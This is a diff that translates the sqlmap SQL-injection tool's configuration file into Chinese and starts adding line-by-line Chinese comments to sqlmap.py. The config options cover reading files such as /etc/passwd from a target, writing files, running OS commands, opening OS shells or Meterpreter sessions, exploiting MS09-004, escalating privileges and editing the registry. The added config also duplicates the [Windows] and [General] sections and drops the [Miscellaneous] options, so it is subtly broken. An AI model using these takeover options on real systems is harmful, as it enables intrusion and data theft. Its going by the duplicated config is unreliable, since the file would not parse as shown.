+# 在枚举过程中检查数据库管理系统数据库的注释。
+# 有效值： True 或 False
+getComments = False  # 设置为 True 将检索数据库对象的注释，默认为 False
 
-# Back-end database management system identifiers (database(s), table(s) and column(s)) to not enumerate.
-exclude = 
+# 检索在数据库管理系统上运行的 SQL 语句。
+# 有效值： True 或 False
+getStatements = False  # 设置为 True 将获取最新的 SQL 查询，默认为 False
 
-# Pivot column name.
-pivotColumn =
+# 待枚举的后端数据库管理系统数据库。
+db =  # 这里填写要枚举的数据库名称
 
-# Use WHERE condition while table dumping (e.g. "id=1").
-dumpWhere = 
+# 待枚举的后端数据库管理系统数据库表。
+tbl =  # 这里填写要枚举的表名称
 
-# Back-end database management system database user to enumerate.
-user = 
+# 待枚举的后端数据库管理系统数据库表列。
+col =  # 这里填写要枚举的列名称
 
-# Exclude DBMS system databases when enumerating tables.
-# Valid: True or False
-excludeSysDbs = False
+# 需要排除的不枚举的后端数据库管理系统标识符（数据库、表和列）。
+exclude =  # 这里填写要排除的数据库、表或列名称，以逗号分隔
 
-# First query output entry to retrieve
-# Valid: integer
-# Default: 0 (sqlmap will start to retrieve the table dump entries from
-# first one)
-limitStart = 0
+# 透视列名。
+pivotColumn =  # 这里填写用于透视的列的名称
 
-# Last query output entry to retrieve
-# Valid: integer
-# Default: 0 (sqlmap will detect the number of table dump entries and
-# retrieve them until the last)
-limitStop = 0
+# 在转储表时使用的 WHERE 条件（例如 "id=1"）。
+dumpWhere =  # 这里填写用于转储数据的 WHERE 条件
 
-# First query output word character to retrieve
-# Valid: integer
-# Default: 0 (sqlmap will enumerate the query output from the first
-# character)
-firstChar = 0
+# 待枚举的后端数据库管理系统数据库用户。
+user =  # 这里填写待枚举的数据库用户名称
 
-# Last query output word character to retrieve
-# Valid: integer
-# Default: 0 (sqlmap will enumerate the query output until the last
-# character)
-lastChar = 0
+# 在枚举表时排除 DBMS 系统数据库。
+# 有效值： True 或 False
+excludeSysDbs = False  # 设置为 True 将排除系统数据库，默认为 False
 
-# SQL statement to be executed.
-# Example: SELECT 'foo', 'bar'
-sqlQuery = 
+# 检索的查询输出第一条条目。
+# 有效值：整数
+# 默认值： 0（sqlmap 将从第一条检索表转储条目）
+limitStart = 0  # 这里可以设置查询结果的起始条目，默认为 0（第一条）
 
-# Prompt for an interactive SQL shell.
-# Valid: True or False
-sqlShell = False
+# 检索的查询输出最后一条条目。
+# 有效值：整数
+# 默认值： 0（sqlmap 将检测表转储条目的数量并检索到最后）
+limitStop = 0  # 这里可以设置查询结果的结束条目，默认为 0（最后一条）
 
-# Execute SQL statements from given file(s).
-sqlFile = 
+# 检索的查询输出第一个字符。
+# 有效值：整数
+# 默认值： 0（sqlmap 将从第一个字符开始枚举查询输出）
+firstChar = 0  # 这里可以设置在输出中检索起始字符的位置，默认为 0
 
+# 最后查询输出的最后一个字符位置。
+# 有效值：整数
+# 默认值： 0（sqlmap将枚举查询输出，直到最后一个字符）
+lastChar = 0  # 这里可以设置检索输出的最后一个字符位置，默认为 0（表示获取所有字符）
 
-# These options can be used to run brute force checks.
-[Brute force]
+# 要执行的 SQL 语句。
+# 示例： SELECT 'foo', 'bar'
+sqlQuery =  # 这里填写要执行的 SQL 查询，例如查询特定数据
 
-# Check existence of common tables.
-# Valid: True or False
-commonTables = False
+# 提升为交互式 SQL shell 提示。
+# 有效值： True 或 False
+sqlShell = False  # 设置为 True 将打开一个交互式 SQL shell，允许手动执行 SQL 语句，默认为 False
 
-# Check existence of common columns.
-# Valid: True or False
-commonColumns = False
+# 从给定文件中执行 SQL 语句。
+sqlFile =  # 这里填写包含 SQL 查询的文件路径，sqlmap将从中读取要执行的 SQL 语句
 
-# Check existence of common files.
-# Valid: True or False
-commonFiles = False
+# 这些选项可用于执行暴力破解检查。
+[Brute force]
 
+# 检查常见表的存在性。
+# 有效值： True 或 False
+commonTables = False  # 设置为 True 将检查数据库中是否存在常见表，默认为 False
 
-# These options can be used to create custom user-defined functions.
-[User-defined function]
+# 检查常见列的存在性。
+# 有效值： True 或 False
+commonColumns = False  # 设置为 True 将检查数据库中是否存在常见列，默认为 False
 
-# Inject custom user-defined functions
-# Valid: True or False
-udfInject = False
+# 检查常见文件的存在性。
+# 有效值： True 或 False
+commonFiles = False  # 设置为 True 将检查数据库中是否存在常见文件，默认为 False
 
-# Local path of the shared library
-shLib = 
+# 这些选项可用于创建自定义用户定义函数。
+[User-defined function]
 
+# 注入自定义用户定义函数。
+# 有效值： True 或 False
+udfInject = False  # 设置为 True 将尝试注入用户定义的函数，默认为 False
 
-# These options can be used to access the back-end database management
-# system underlying file system.
-[File system]
+# 共享库的本地路径。
+shLib =  # 这里填写要注入的共享库的文件路径，通常是动态链接库
 
-# Read a specific file from the back-end DBMS underlying file system.
-# Examples: /etc/passwd or C:\boot.ini
-fileRead = 
+# 这些选项可以用来访问后端数据库管理系统底层文件系统。
+[File system]
 
-# Write a local file to a specific path on the back-end DBMS underlying
-# file system.
-# Example: /tmp/sqlmap.txt or C:\WINNT\Temp\sqlmap.txt
-fileWrite = 
+# 从后端 DBMS 底层文件系统读取特定文件。
+# 示例： /etc/passwd 或 C:\boot.ini
+fileRead =  # 这里填写要读取的文件路径，sqlmap将尝试读取该文件内容
 
-# Back-end DBMS absolute filepath to write the file to.
-fileDest = 
+# 将本地文件写入后端 DBMS 底层文件系统的特定路径。
+# 示例： /tmp/sqlmap.txt 或 C:\WINNT\Temp\sqlmap.txt
+fileWrite =  # 这里填写要写入的文件路径，sqlmap将尝试将本地文件写入该路径
 
+# 后端数据库管理系统的绝对文件路径以写入文件。
+fileDest =  # 这里填写目标文件的路径，sqlmap将尝试将文件写入该路径
 
-# These options can be used to access the back-end database management
-# system underlying operating system.
+# 这些选项可用于访问后端数据库管理系统底层操作系统。
 [Takeover]
 
-# Execute an operating system command.
-# Valid: operating system command
-osCmd = 
+# 执行操作系统命令。
+# 有效值：操作系统命令
+osCmd =  # 这里填写要执行的操作系统命令，sqlmap将尝试在目标系统上执行该命令
 
-# Prompt for an interactive operating system shell.
-# Valid: True or False
-osShell = False
+# 提升为交互式操作系统 shell 提示。
+# 有效值： True 或 False
+osShell = False  # 设置为 True 将打开一个交互式系统 shell，默认为 False
 
-# Prompt for an out-of-band shell, Meterpreter or VNC.
-# Valid: True or False
-osPwn = False
+# 提升为出带外 shell，Meterpreter 或 VNC。
+# 有效值： True 或 False
+osPwn = False  # 设置为 True 尝试创建一个出带外的 shell 连接，默认为 False
 
-# One click prompt for an out-of-band shell, Meterpreter or VNC.
-# Valid: True or False
-osSmb = False
+# 一键提示出带外 shell，Meterpreter 或 VNC。
+# 有效值： True 或 False
+osSmb = False  # 设置为 True 尝试利用 SMB 协议一键获取回调 shell，默认为 False
 
-# Microsoft SQL Server 2000 and 2005 'sp_replwritetovarbin' stored
-# procedure heap-based buffer overflow (MS09-004) exploitation.
-# Valid: True or False
-osBof = False
+# 微软 SQL Server 2000 和 2005 的 'sp_replwritetovarbin' 存储过程堆基缓冲区溢出（MS09-004）利用。
+# 有效值： True 或 False
+osBof = False  # 设置为 True 尝试利用缓冲区溢出漏洞，默认为 False
 
-# Database process' user privilege escalation.
-# Note: Use in conjunction with osPwn, osSmb or osBof. It will force the
-# payload to be Meterpreter.
-privEsc = False
+# 数据库进程的用户权限提升。
+# 注意：与 osPwn、osSmb 或 osBof 一起使用。它将强制 payload 为 Meterpreter。
+privEsc = False  # 设置为 True 将尝试提升用户权限，默认为 False
 
-# Local path where Metasploit Framework is installed.
-# Valid: file system path
-msfPath = 
+# 本地的 Metasploit Framework 安装路径。
+# 有效值：文件系统路径
+msfPath =  # 这里填写 Metasploit Framework 安装目录的路径，用于进行攻击的时候，如生成 payload
 
-# Remote absolute path of temporary files directory.
-# Valid: absolute file system path
-tmpPath = 
+# 远程临时文件目录的绝对路径。
+# 有效值：绝对文件系统路径
+tmpPath =  # 这里填写用于在目标系统上存放临时文件的路径，方便进行临时文件操作
 
-
-# These options can be used to access the back-end database management
-# system Windows registry.
+# 这些选项可以用来访问后端数据库管理系统的 Windows 注册表。
 [Windows]
 
-# Read a Windows registry key value.
-# Valid: True or False
-regRead = False
-
-# Write a Windows registry key value data.
-# Valid: True or False
-regAdd = False
+# 读取 Windows 注册表键值。
+# 有效值： True 或 False
+regRead = False  # 设置为 True 将尝试读取 Windows 注册表项，默认为 False
 
-# Delete a Windows registry key value.
-# Valid: True or False
-regDel = False
+# 写入 Windows 注册表键值数据。
+# 有效值： True 或 False
+regAdd = False  # 设置为 True 将尝试添加或更新 Windows 注册表项，默认为 False
 
-# Windows registry key.
-regKey = 
+# 删除 Windows 注册表键值。
+# 有效值： True 或 False
+regDel = False  # 设置为 True 将尝试删除指定的 Windows 注册表项，默认为 False
 
-# Windows registry key value.
-regVal = 
+# Windows 注册表键。
+regKey =  # 这里填写要读取、修改或删除的 Windows 注册表键名称
 
-# Windows registry key value data.
-regData = 
+# Windows 注册表键值。
+regVal =  # 这里填写要操作的 Windows 注册表值
 
-# Windows registry key value type.
-regType = 
+# Windows 注册表键值数据类型。
+regData =  # 这里填写要写入的注册表键值的数据，如字符串、DWORD 等
 
+# Windows 注册表键值类型。
+regType =  # 这里填写注册表值的数据类型，如 REG_SZ、REG_DWORD 等
 
-# These options can be used to set some general working parameters.
+# 这些选项可用于设置一些通用工作参数。
 [General]
 
-# Load session from a stored (.sqlite) file
-# Example: output/www.target.com/session.sqlite
-sessionFile = 
+# 从存储的 (.sqlite) 文件中加载会话。
+# 示例： output/www.target.com/session.sqlite
+sessionFile =  # 这里填写要加载的会话文件路径，用于恢复之前的会话信息
+
+# 将所有 HTTP 流量记录到文本文件中。
+trafficFile =  # 这里填写记录 HTTP 请求和响应的文件路径，可以用于调试和分析
+
+# 在空结果上中止数据检索。
+# 有效值： True 或 False
+abortOnEmpty = False  # 设置为 True 如果没有结果则中止检索，默认为 False，即继续执行
+
+# 设置预定义的答案（例如 "quit=N,follow=N"）。
+answers =  # 这里填写用于自动响应的设置，允许无交互操作
+
+# 包含 Base64 编码数据的参数。
+base64Parameter =  # 这里填写包含 Base64 编码数据的参数名，用于处理编码数据
 
-# Log all HTTP traffic into a textual file.
-trafficFile = 
+# 使用 URL 和文件名安全的 Base64 字母表（参考：https://en.wikipedia.org/wiki/Base64#URL_applications）。
+# 有效值： True 或 False
+base64Safe = False  # 设置为 True 使用 URL 安全的 Base64 编码，默认为 False
 
-# Abort data retrieval on empty results.
-abortOnEmpty = False
+# 从不请求用户输入，使用默认行为。
+# 有效值： True 或 False
+batch = False  # 设置为 True 将不询问用户输入，直接使用默认值，默认为 False
 
-# Set predefined answers (e.g. "quit=N,follow=N").
-answers =
+# 结果字段中包含二进制值（例如 "digest"）。
+binaryFields =  # 这里填写包含二进制数据（如哈希值）的字段名称
 
-# Parameter(s) containing Base64 encoded data
-base64Parameter =
+# 在评估目标之前检查 Internet 连接。
+# 有效值： True 或 False
+checkInternet = False  # 设置为 True 将在攻击之前检查互联网连接，默认为 False
 
-# Use URL and filename safe Base64 alphabet (Reference: https://en.wikipedia.org/wiki/Base64#URL_applications).
-# Valid: True or False
-base64Safe = False
+# 清理数据库管理系统中的 sqlmap 特定 UDF 和表。
+# 有效值： True 或 False
+cleanup = False  # 设置为 True 将清除 sqlmap 创建的 UDF 和表，默认为 False
 
-# Never ask for user input, use the default behaviour.
-# Valid: True or False
-batch = False
+# 爬虫从目标 URL 开始。
+# 有效值：整数
+# 默认值： 0
+crawlDepth = 0  # 设置爬虫的深度，默认为 0 表示不进行爬虫，数字越大越深入
 
-# Result fields having binary values (e.g. "digest").
-binaryFields =
+# 用于排除爬虫的页面的正则表达式（例如 "logout"）。
+crawlExclude =  # 这里填写正则表达式，用于匹配需要排除的页面路径
 
-# Check Internet connection before assessing the target.
-checkInternet = False
+# CSV 输出中使用的分隔符字符。
+# 默认值： ,
+csvDel = ,  # 这里设置 CSV 输出的字段分隔符，默认为逗号
 
-# Clean up the DBMS from sqlmap specific UDF and tables.
-# Valid: True or False
-cleanup = False
+# 将转储的数据存储到自定义文件中。
+dumpFile =  # 这里填写转储数据的目标文件路径，可以指定保存位置和文件名
 
-# Crawl the website starting from the target URL.
-# Valid: integer
-# Default: 0
-crawlDepth = 0
+# 转储数据的格式
+# 有效值： CSV、HTML 或 SQLITE
+dumpFormat = CSV  # 设置转储数据的格式，默认为 CSV
 
-# Regexp to exclude pages from crawling (e.g. "logout").
-crawlExclude =
+# 强制用于数据检索的字符编码。
+encoding =  # 这里填写强制使用的字符编码，例如 "utf-8"，用于数据处理
 
-# Delimiting character used in CSV output.
-# Default: ,
-csvDel = ,
+# 获取每个查询输出长度并实时计算预计到达时间。
+# 有效值： True 或 False
+eta = False  # 设置为 True 将显示每个请求的预计到达时间，默认为 False
 
-# Store dumped data to a custom file.
-dumpFile =
+# 清除当前目标的会话文件。
+# 有效值： True 或 False
+flushSession = False  # 设置为 True 将清除先前会话的数据，默认为 False
 
-# Format of dumped data
-# Valid: CSV, HTML or SQLITE
-dumpFormat = CSV
+# 解析并测试目标 URL 上的表单。
+# 有效值： True 或 False
+forms = False  # 设置为 True 将解析和测试目标页面的 HTML 表单，默认为 False
 
-# Force character encoding used for data retrieval.
-encoding = 
+# 忽略存储在会话文件中的查询结果。
+# 有效值： True 或 False
+freshQueries = False  # 设置为 True 将忽略会话中的查询缓存，重新进行测试，默认为 False
 
-# Retrieve each query output length and calculate the estimated time of
-# arrival in real time.
-# Valid: True or False
-eta = False
+# 使用指定页码的 Google dork 结果。
+# 有效值：整数
+# 默认值： 1
+googlePage = 1  # 设置使用的 Google dork 结果的页码，从第1页开始，默认为 1
 
-# Flush session files for current target.
-# Valid: True or False
-flushSession = False
+# 在数据检索过程中使用十六进制转换。
+# 有效值： True 或 False
+hexConvert = False  # 设置为 True 将在数据处理过程中启用十六进制格式，默认为 False
 
-# Parse and test forms on target URL.
-# Valid: True or False
-forms = False
+# 自定义输出目录路径。
+outputDir =  # 这里填写输出文件的自定义目录路径，保存结果文件
 
-# Ignore query results stored in session file.
-# Valid: True or False
-freshQueries = False
+# 解析并显示响应中的数据库管理系统错误消息。
+# 有效值： True 或 False
+parseErrors = False  # 设置为 True 将在输出中解析并显示数据库管理系统的错误信息，默认为 False
 
-# Use Google dork results from specified page number.
-# Valid: integer
-# Default: 1
-googlePage = 1
+# 使用给定脚本进行请求的预处理。
+preprocess =  # 这里填写请求预处理的脚本路径，用于自定义请求数据
 
-# Use hex conversion during data retrieval.
-# Valid: True or False
-hexConvert = False
+# 使用给定脚本进行响应数据的后处理。
+postprocess =  # 这里填写响应后处理的脚本路径，用于处理返回的数据
+
+# 重新转储具有未知字符标记（？）的条目。
+# 有效值： True 或 False
+repair = False  # 设置为 True 将尝试重新转储具有不明字符的条目，默认为 False
+
+# 用于从提供的 Burp 或 WebScarab 代理日志中过滤目标的正则表达式。
+# 示例： (google|yahoo)
+scope =  # 这里填写正则表达式，用于匹配并过滤目标的日志条目
+
+# 跳过对 SQLi/XSS 漏洞的启发式检测。
+# 有效值： True 或 False
+skipHeuristics = False  # 设置为 True 将跳过对 SQL 注入和 XSS 漏洞的启发式检测，默认为 False
+
+# 跳过对 WAF/IPS 保护的启发式检测。
+# 有效值： True 或 False
+skipWaf = False  # 设置为 True 将跳过对 Web 应用防火墙/入侵防御系统的检测，默认为 False
+
+# 本地的 Metasploit Framework 安装路径。
+# 有效值：文件系统路径
+msfPath =  # 这里填写本地 Metasploit Framework 的安装路径，用于与该工具集成
+
+# 远程临时文件目录的绝对路径。
+# 有效值：绝对文件系统路径
+tmpPath =  # 这里填写用于存放临时文件的路径，允许在目标空间写入操作
+
+# 这些选项可以用来访问后端数据库管理系统的 Windows 注册表。
+[Windows]
+
+# 读取 Windows 注册表键值。
+# 有效值： True 或 False
+regRead = False  # 设置为 True 将尝试读取指定的 Windows 注册表键，默认为 False
+
+# 写入 Windows 注册表键值数据。
+# 有效值： True 或 False
+regAdd = False  # 设置为 True 将尝试添加或修改指定的注册表键值，默认为 False
+
+# 删除 Windows 注册表键值。
+# 有效值： True 或 False
+regDel = False  # 设置为 True 将尝试删除指定的 Windows 注册表键，默认为 False
+
+# Windows 注册表键。
+regKey =  # 这里填写要操作的 Windows 注册表键的名称，指定要读取或修改的键
+
+# Windows 注册表键值。
+regVal =  # 这里填写要操作的 Windows 注册表键的具体值，用于写入或读取
+
+# Windows 注册表键值数据类型。
+regData =  # 这里填写要写入的注册表键值的数据类型，例如字符串或 DWORD
+
+# Windows 注册表键值类型。
+regType =  # 这里填写注册表值的数据类型，如 REG_SZ（字符串类型）或 REG_DWORD
+
+# 这些选项可用于设置一些通用工作参数。
+[General]
 
-# Custom output directory path.
-outputDir =
+# 从存储的 (.sqlite) 文件中加载会话。
+# 示例： output/www.target.com/session.sqlite
+sessionFile =  # 这里填写要加载会话的文件路径，用于恢复之前的进程
 
-# Parse and display DBMS error messages from responses.
-# Valid: True or False
-parseErrors = False
+# 将所有 HTTP 流量记录到文本文件中。
+trafficFile =  # 这里填写日志文件路径，用于记录 HTTP 请求和响应，便于后期分析
 
-# Use given script(s) for preprocessing of request.
-preprocess =
+# 在空结果上中止数据检索。
+# 有效值： True 或 False
+abortOnEmpty = False  # 设置为 True 时，如果没有结果将中止检索，默认为 False
 
-# Use given script(s) for postprocessing of response data.
-postprocess =
+# 设置预定义的答案（例如 "quit=N,follow=N"）。
+answers =  # 这里填写针对提示的预定义回答，用于自动化操作
 
-# Redump entries having unknown character marker (?).
-# Valid: True or False
-repair = False
+# 包含 Base64 编码数据的参数。
+base64Parameter =  # 这里填写要包含 Base64 编码数据的参数名，便于数据处理
 
-# Regular expression for filtering targets from provided Burp.
-# or WebScarab proxy log.
-# Example: (google|yahoo)
-scope = 
+# 使用 URL 和文件名安全的 Base64 字母表（参考：https://en.wikipedia.org/wiki/Base64#URL_applications）。
+# 有效值： True 或 False
+base64Safe = False  # 设置为 True 使用改良的 Base64 编码，适合 URL 的安全性，默认为 False
 
-# Skip heuristic detection of SQLi/XSS vulnerabilities.
-# Valid: True or False
-skipHeuristics = False
+# 从不请求用户输入，使用默认行为。
+# 有效值： True 或 False
+batch = False  # 设置为 True 将禁用任何用户输入，直接使用默认选项，默认为 False
 
-# Skip heuristic detection of WAF/IPS protection.
-# Valid: True or False
-skipWaf = False
+# 结果字段中包含二进制值（例如 "digest"）。
+binaryFields =  # 这里填写包含二进制数据的字段名，便于处理数据
 
-# Prefix used for temporary tables.
-# Default: sqlmap
-tablePrefix = sqlmap
+# 在评估目标之前检查 Internet 连接。
+# 有效值： True 或 False
+checkInternet = False  # 设置为 True 时将在执行前检查网络连接，默认为 False
 
-# Select tests by payloads and/or titles (e.g. ROW).
-testFilter =
+# 清理数据库管理系统中的 sqlmap 特定 UDF 和表。
+# 有效值： True 或 False
+cleanup = False  # 设置为 True 将移除 sqlmap 创建的用户定义函数 (UDF) 和表，默认为 False
 
-# Skip tests by payloads and/or titles (e.g. BENCHMARK).
-testSkip =
+# 爬虫从目标 URL 开始。
+# 有效值：整数
+# 默认值： 0
+crawlDepth = 0  # 设置爬虫的深度，默认为 0 表示不进行深度爬取，数字越大爬取越深
 
-# Run with a time limit in seconds (e.g. 3600).
-timeLimit =
+# 用于排除爬虫的页面的正则表达式（例如 "logout"）。
+crawlExclude =  # 这里填写正则表达式，以匹配需要排除的 URL 页面
 
-# Disable escaping of DBMS identifiers (e.g. "user").
-unsafeNaming = False
+# CSV 输出中使用的分隔符字符。
+# 默认值： ,
+csvDel = ,  # 设置 CSV 格式输出的字段分隔符，默认为逗号
 
-# Web server document root directory (e.g. "/var/www").
-webRoot =
+# 将转储的数据存储到自定义文件中。
+dumpFile =  # 这里填写输出转储数据的文件路径和文件名
 
+# 转储数据的格式
+# 有效值： CSV、HTML 或 SQLITE
+dumpFormat = CSV  # 设置转储数据的格式，默认为 CSV 文件格式
 
-[Miscellaneous]
+# 强制用于数据检索的字符编码。
+encoding =  # 这里填写强制使用的字符编码，例如 "utf-8"，便于处理字符数据
 
-# Run host OS command(s) when SQL injection is found.
-alert =
+# 获取每个查询输出长度并实时计算预计到达时间。
+# 有效值： True 或 False
+eta = False  # 设置为 True 时将计算并显示每个请求的预计到达时间，默认为 False
 
-# Beep on question and/or when SQL injection is found.
-# Valid: True or False
-beep = False
+# 清除当前目标的会话文件。
+# 有效值： True 或 False
+flushSession = False  # 设置为 True 将清除当前会话的数据，默认为 False
 
-# Offline WAF/IPS payload detection testing.
-# Valid: True or False
-checkPayload = False
+# 解析并测试目标 URL 上的表单。
+# 有效值： True 或 False
+forms = False  # 设置为 True 将解析 HTML 表单并进行测试，默认为 False
 
-# Check for missing (optional) sqlmap dependencies.
-# Valid: True or False
-dependencies = False
+# 忽略存储在会话文件中的查询结果。
+# 有效值： True 或 False
+freshQueries = False  # 设置为 True 将忽略会话中已存储的查询记录，默认为 False
 
-# Disable console output coloring.
-# Valid: True or False
-disableColoring = False
+# 使用指定页码的 Google dork 结果。
+# 有效值：整数
+# 默认值： 1
+googlePage = 1  # 设置使用的 Google dork 结果的页码，默认为第 1 页
 
-# Display list of available tamper scripts.
-# Valid: True or False
-listTampers = False
+# 在数据检索过程中使用十六进制转换。
+# 有效值： True 或 False
+hexConvert = False  # 设置为 True 将在数据处理中启用十六进制格式，默认为 False
 
-# Disable logging to a file.
-# Valid: True or False
-noLogging = False
+# 自定义输出目录路径。
+outputDir =  # 这里填写输出文件的自定义目录路径，便于存储数据结果
 
-# Work in offline mode (only use session data)
-# Valid: True or False
-offline = False
+# 解析并显示响应中的数据库管理系统错误消息。
+# 有效值： True 或 False
+parseErrors = False  # 设置为 True 将在响应中解析并显示数据库错误信息，默认为 False
 
-# Location of CSV results file in multiple targets mode.
-resultsFile =
+# 使用给定脚本进行请求的预处理。
+preprocess =  # 这里填写请求预处理脚本的路径，用于修改请求数据
 
-# Local directory for storing temporary files.
-tmpDir =
+# 使用给定脚本进行响应数据的后处理。
+postprocess =  # 这里填写响应后处理脚本的路径，用于处理返回的数据
 
-# Adjust options for unstable connections.
-# Valid: True or False
-unstable = False
+# 重新转储具有未知字符标记（？）的条目。
+# 有效值： True 或 False
+repair = False  # 设置为 True 将尝试重新转储带有未知字符的条目，默认为 False
 
-# Update sqlmap.
-# Valid: True or False
-updateAll = False
+# 用于从提供的 Burp 或 WebScarab 代理日志中过滤目标的正则表达式。
+# 示例： (google|yahoo)
+scope =  # 这里填写正则表达式，用于筛选指定的目标
 
-# Simple wizard interface for beginner users.
-# Valid: True or False
-wizard = False
+# 跳过对 SQLi/XSS 漏洞的启发式检测。
+# 有效值： True 或 False
+skipHeuristics = False  # 设置为 True 跳过 SQL 注入和 XSS 漏洞的启发式检测，默认为 False
 
-# Verbosity level.
-# Valid: integer between 0 and 6
-# 0: Show only error and critical messages
-# 1: Show also warning and info messages
-# 2: Show also debug messages
-# 3: Show also payloads injected
-# 4: Show also HTTP requests
-# 5: Show also HTTP responses' headers
-# 6: Show also HTTP responses' page content
-# Default: 1
-verbose = 1
+# 跳过对 WAF/IPS 保护的启发式检测。
+# 有效值： True 或 False
+skipWaf = False  # 设置为 True 跳过对 Web 应用防火墙和入侵防御系统的检测，默认为 False
diff --git a/src/sqlmap-master/sqlmap.py b/src/sqlmap-master/sqlmap.py
index 70fb972..856e547 100644
--- a/src/sqlmap-master/sqlmap.py
+++ b/src/sqlmap-master/sqlmap.py
@@ -1,626 +1,678 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) 
 See the file 'LICENSE' for copying permission
 """
 
-from __future__ import print_function
+from __future__ import print_function  # 导入print_function特性，确保在Python 2和3中print函数的行为一致
 
 try:
-    import sys
+    import sys  # 导入sys模块，用于处理与Python解释器相关的操作
 
-    sys.dont_write_bytecode = True
+    # 防止Python自动生成.pyc文件
+    sys.dont_write_bytecode = True  # 设置不生成.pyc字节码文件，以减少磁盘空间占用和加载时间
 
     try:
-        __import__("lib.utils.versioncheck")  # this has to be the first non-standard import
-    except ImportError:
-        sys.exit("[!] wrong installation detected (missing modules). Visit 'https://github.com/sqlmapproject/sqlmap/#installation' for further details")
-
-    import bdb
-    import glob
-    import inspect
-    import json
-    import logging
-    import os
-    import re
-    import shutil
-    import sys
-    import tempfile
-    import threading
-    import time
-    import traceback
-    import warnings
-
-    if "--deprecations" not in sys.argv:
-        warnings.filterwarnings(action="ignore", category=DeprecationWarning)
-    else:
-        warnings.resetwarnings()
-        warnings.filterwarnings(action="ignore", message="'crypt'", category=DeprecationWarning)
-        warnings.simplefilter("ignore", category=ImportWarning)
-        if sys.version_info >= (3, 0):
-            warnings.simplefilter("ignore", category=ResourceWarning)
-
-    warnings.filterwarnings(action="ignore", message="Python 2 is no longer supported")
-    warnings.filterwarnings(action="ignore", message=".*was already imported", category=UserWarning)
-    warnings.filterwarnings(action="ignore", message=".*using a very old release", category=UserWarning)
-    warnings.filterwarnings(action="ignore", message=".*default buffer size will be used", category=RuntimeWarning)
-    warnings.filterwarnings(action="ignore", category=UserWarning, module="psycopg2")
-
-    from lib.core.data import logger
-
-    from lib.core.common import banner
-    from lib.core.common import checkPipedInput
-    from lib.core.common import checkSums
-    from lib.core.common import createGithubIssue
-    from lib.core.common import dataToStdout
-    from lib.core.common import extractRegexResult
-    from lib.core.common import filterNone
-    from lib.core.common import getDaysFromLastUpdate
-    from lib.core.common import getFileItems
-    from lib.core.common import getSafeExString
-    from lib.core.common import maskSensitiveData
-    from lib.core.common import openFile
-    from lib.core.common import setPaths
-    from lib.core.common import weAreFrozen
-    from lib.core.convert import getUnicode
-    from lib.core.common import setColor
-    from lib.core.common import unhandledExceptionMessage
-    from lib.core.compat import LooseVersion
-    from lib.core.compat import xrange
-    from lib.core.data import cmdLineOptions
-    from lib.core.data import conf
-    from lib.core.data import kb
-    from lib.core.datatype import OrderedSet
-    from lib.core.enums import MKSTEMP_PREFIX
-    from lib.core.exception import SqlmapBaseException
-    from lib.core.exception import SqlmapShellQuitException
-    from lib.core.exception import SqlmapSilentQuitException
-    from lib.core.exception import SqlmapUserQuitException
-    from lib.core.option import init
-    from lib.core.option import initOptions
-    from lib.core.patch import dirtyPatches
-    from lib.core.patch import resolveCrossReferences
-    from lib.core.settings import GIT_PAGE
-    from lib.core.settings import IS_WIN
-    from lib.core.settings import LAST_UPDATE_NAGGING_DAYS
-    from lib.core.settings import LEGAL_DISCLAIMER
-    from lib.core.settings import THREAD_FINALIZATION_TIMEOUT
-    from lib.core.settings import UNICODE_ENCODING
-    from lib.core.settings import VERSION
-    from lib.parse.cmdline import cmdLineParser
-    from lib.utils.crawler import crawl
-except KeyboardInterrupt:
-    errMsg = "user aborted"
-
-    if "logger" in globals():
-        logger.critical(errMsg)
-        raise SystemExit
-    else:
-        import time
-        sys.exit("\r[%s] [CRITICAL] %s" % (time.strftime("%X"), errMsg))
-
-def modulePath():
-    """
-    This will get us the program's directory, even if we are frozen
-    using py2exe
+        # 检查sqlmap的安装是否正确
+        __import__("lib.utils.versioncheck")  # 动态导入lib.utils.versioncheck模块，通常用于检查版本兼容性
+    except ImportError:  # 如果导入失败（例如模块不存在），则执行以下代码
+        sys.exit("[!] wrong installation detected (missing modules). Visit 'https://github.com/sqlmapproject/sqlmap/#installation' for further details")  # 退出程序并提示安装错误，建议用户访问指定链接查看安装说明
+
+    # 导入标准库模块
+    import bdb  # 导入bdb模块，用于调试器支持
+    import glob  # 导入glob模块，用于文件路径匹配
+    import inspect  # 导入inspect模块，用于获取对象信息
+    import json  # 导入json模块，用于处理JSON数据
+    import logging  # 导入logging模块，用于记录日志信息
+    import os  # 导入os模块，用于与操作系统进行交互
+    import re  # 导入re模块，用于正则表达式操作
+    import shutil  # 导入shutil模块，用于文件操作（如复制、删除等）
+    import sys  # 再次导入sys模块，确保其可用性
+    import tempfile  # 导入tempfile模块，用于创建临时文件和目录
+    import threading  # 导入threading模块，用于多线程支持
+    import time  # 导入time模块，用于时间相关操作
+    import traceback  # 导入traceback模块，用于获取异常信息
+    import warnings  # 导入warnings模块，用于处理警告信息
+
+    # 忽略DeprecationWarning，除非命令行参数中包含"--deprecations"
+    if "--deprecations" not in sys.argv:  # 如果命令行参数中不包含"--deprecations"
+        warnings.filterwarnings(action="ignore", category=DeprecationWarning)  # 忽略所有DeprecationWarning类别的警告
+    else:  # 如果命令行参数中包含"--deprecations"
+        warnings.resetwarnings()  # 重置警告过滤器
+        warnings.filterwarnings(action="ignore", message="'crypt'", category=DeprecationWarning)  # 忽略特定消息的DeprecationWarning
+        warnings.simplefilter("ignore", category=ImportWarning)  # 忽略所有ImportWarning类别的警告
+        if sys.version_info >= (3, 0):  # 如果Python版本大于等于3.0
+            warnings.simplefilter("ignore", category=ResourceWarning)  # 忽略所有ResourceWarning类别的警告
+
+    # 忽略特定警告
+    warnings.filterwarnings(action="ignore", message="Python 2 is no longer supported")  # 忽略关于Python 2不再支持的警告
+    warnings.filterwarnings(action="ignore", message=".*was already imported", category=UserWarning)  # 忽略关于模块已导入的UserWarning
+    warnings.filterwarnings(action="ignore", message=".*using a very old release", category=UserWarning)  # 忽略关于使用旧版本的UserWarning
+    warnings.filterwarnings(action="ignore", message=".*default buffer size will be used", category=RuntimeWarning)  # 忽略关于默认缓冲区大小的RuntimeWarning
+    warnings.filterwarnings(action="ignore", category=UserWarning, module="psycopg2")  # 忽略psycopg2模块的UserWarning
+
+    # 导入sqlmap的核心日志模块
+    from lib.core.data import logger  # 从lib.core.data模块导入logger对象，用于记录日志信息
+
+    # 导入sqlmap的核心功能模块
+    from lib.core.common import banner  # 从lib.core.common模块导入banner函数，用于显示程序横幅
